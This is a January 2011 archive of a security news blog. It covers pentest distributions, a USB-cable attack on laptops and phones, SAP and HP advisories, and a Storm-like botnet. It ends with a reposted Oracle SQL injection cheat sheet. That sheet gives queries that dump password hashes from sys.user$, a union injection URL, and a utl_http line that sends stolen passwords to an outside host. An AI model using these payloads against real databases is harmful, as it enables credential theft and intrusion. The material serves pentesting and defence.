SK: January 2011

Friday, January 21, 2011

VAST Live Distro beta 2.77

VAST is a VIPER Lab live distribution that contains VIPER developed tools such as UCsniff, videojak, videosnarf and more. Along with VIPER tools and other essential VoIP security tools, it also contains tools penetration testers utilize such as Metasploit, Nmap, and Hydra.This distribution is a work in progress. If you would like to see a tool or package included please feel free to suggest them and I will do what I can to make it happen. VAST also has built into synaptic package manager a third party repository link for the VIPER tools, so when we update a tool it's as easy as "apt-get".VAST beta 2.74 has been released with UCSniff 3.0 which includes GUI interface, VoIP video realtime monitoring, TFTP MitM modification of IP phone features, Gratuitous ARP disablement bypass support, and support for several compression codecs. The new VAST also has a new look as well.

http://vipervast.sourceforge.net/

Thursday, January 20, 2011

Researchers turn USB cable into attack tool

Two researchers have figured out a way to attack laptops and smartphones through an innocent-looking USB cable.

Angelos Stavrou, an assistant professor of computer science at George Mason University, and student Zhaohui Wang wrote software that changes the functionality of the USB driver so that they could launch a surreptitious attack while someone is charging a smartphone or syncing data between a smartphone and a computer.

Basically, the exploit works by adding keyboard or mouse functionality to the connection so an attacker can then start typing commands or click the mouse in order to steal files, download additional malware, or do other things to take control of the computer, Stavrou told CNET in an interview. The exploit is enabled because the USB protocol can be used to connect any device to a computing platform without authentication, he said.

He and his partner were scheduled to demonstrate an attack at the Black Hat DC conference today.

The exploit software they wrote identifies what operating sysetm is running on the device the USB cable is connected to. On Macintosh and Windows machines, a message pops up saying the system has detected a new human interface device, but there is no easily recognizable way to halt the process, Stavrou said. The Mac pop-up can be quickly removed by an attacker with a command sent via the smartphone so the laptop owner may not even see it, while the Windows pop-up lasts only one or two seconds in the lower left corner, making that an ineffective warning too, he said.

Linux machines offer no warning, so users will have no idea that something out of the ordinary is happening, particularly since the regular keyboard and mouse continue to function normally during an attack, Stavrou said.

"The operating system should present a pop-up and ask if the user really wants to connect the device" and specify what type of device is being identified to the system, he said.

The researchers wrote the exploit for Android devices only at this point. "It can be done for iPhone, but we didn't do it yet," Stavrou said. "It can work on any computing device that uses USB," and it can work between two smartphones by connecting a USB cable between then, he said.

"Say your computer at home is compromised and you compromise your Android phone by connecting them," he said. "Then, whenever you connect the smartphone to another laptop or computing device I can take over that computer also, and then compromise other computers off that Android. It's a viral type of compromise using the USB cable."

The original compromise can happen by downloading the exploit from the Web or running an app that is compromised. The researchers have created exploit software to run on a computer, and an exploit to run on Android that is a modification of the Android operating system kernel. Scripts can then be written for the actual attack.

Antivirus software wouldn't necessarily stop this because it can't tell that the activities of the exploit are not controlled or sanctioned by the user, Stavrou said. "It's hard to separate good behavior from bad behavior when it comes from the keyboard," he said.

There's not much a person can do to protect against this at this time, according to Stavrou. The operating systems should have the capability for devices to inspect USB traffic and alert users about what exactly is happening over the connection and give them the option of refusing an action, he said.

Wednesday, January 12, 2011

SAP Management Console Information Disclosure

It has been detected that many of the available methods in the sapstartsrv SOAP server do not require user authentication, allowing remote and
unauthenticated users to obtain sensitive information from the SAP system, such as the list of log files and their content, profile parameters,
developer traces, etc.

Furthermore, some of the unauthenticated methods perform security sensitive operations that may impact over the integrity, confidentiality and/or
availability of the SAP system.

Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their
systems and protect against the exploitation of the described vulnerability.

- - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-002

HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code

Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code under the context of the user running the web server.

References: CVE-2011-0261 (ZDI-CAN-753)

Thanks: bugtraq@securityfocus.com

SAP Management Console Unauthenticated Service Restart

A Denial of Service vulnerability has been discovered in the processing of administration commands by the SAP MC. This functionality allows the
restart of the service without providing authentication information.

Technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their
systems and protect against the exploitation of the described vulnerability.

- - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-001

Friday, January 7, 2011

Katana: Portable Multi-Boot Security Suite

Katana 2.0

Katana is a portable multi-boot security suite which brings together many of today's best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Abel, and many more.

http://www.hackfromacave.com/katana.html#katana_installation

Tuesday, January 4, 2011

ESET Threat Blog - New Botnet: Storm Signal?

Thanks

Niels Groeneveld

« previous
next »

New Botnet: Storm Signal?

BY DAVID HARLEY

December 31, 2010 at 12:55 pm

Pierre-Marc tells me that he has received two malware samples that grabbed his attention due to their resemblance to Storm/Waledac. They use the same kind of distribution mechanism: that is, spam with links to a New Year eCard for New year with titles like "New Year Wishes!" and "You Received an Ecard." The mail contains a link to a website that tells the victim he needs Flash to view the content.

The links seen so far redirect to a linked binary named to look like a Flash Player installation program (of course, it isn't).

The downloaded binaries are huge, weighing in at 475K packed. The modus operandi strongly resembles Storm for the following reasons:

It uses fast flux
It presents itself as an eCard, the malicious binary passes itself off as Flash, and so on.
Many compiled libraries are associated with the binary
Infected hosts are used to extend the malware's proxy capabilities
It appears to be making use of a decentralized network protocol (p2p) based on HTTP: investigation continues.
The bot has spamming capabilities

ShadowServer has started talking about this publicly. For now, we're not seeing other sources mentioning it, but Pierre-Marc agrees with their assessment.

The samples seen so far are detected by nod32 as Agent.WSA (detection added December 29th), or Win32/Kryptik.JHS.

The botnet is still in the development phase, apparently: the gang is releasing quick updates and some of their servers are not responding, probably because they are unable to cope with the wave of new infections. This also closely resembles problems we saw during the early stages of the earlier botnets.

David Harley
Pierre-Marc Bureau

ORACLE SQL Injection Cheat Sheet

From http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/

Introduction

Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.

ORACLE SQL Injection Notes

In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.

i.e. SELECT 'dummydata' || 'x' FROM DUAL;

You have to close comments if you used /* comment */ style comments

Concatenation

SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;

Comments

/* comment */

Note : You have to close this comments properly otherwise you'll get syntax error.

Line comment : --

Casting

For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;

Strings without quotes

SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;

Getting Stuff

Getting Tables

SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'

Getting Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'

Getting Current Database Name

SELECT global_name FROM global_name

Getting Users and Passwords

SELECT name, password FROM sys.user$ where type#=1

Getting version

Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'

Getting Current User

SELECT user FROM dual

Simple Union Query

http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL

Simulating SQL Server's TOP feature

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;

Moving Records one by one

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;

Functions useful for Blind SQL Injetion

BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
CHR() - Convert to Char
ASCII() - Convert to ASCII
SUBSTR() - Substring
BITAND() - Bit And operation
LOWER() - Convert to LowerCase

Doing outbound connections

SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;

You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.

References, Papers & Credits

Thanks to Pentestmonkey, Notsosecure, Alexander Kornbrust
SQL Injection Attacks for ORACLE Developers
Red Database Security Papers
SQL Injection Cheat Sheet

Document History

02/10/2007 - Public Release
02/10/2007 - Getting passwords section and utl_http replaced with new and easier ones. Thanks to Alexander Kornbrust
09/10/2007 - Sleep function added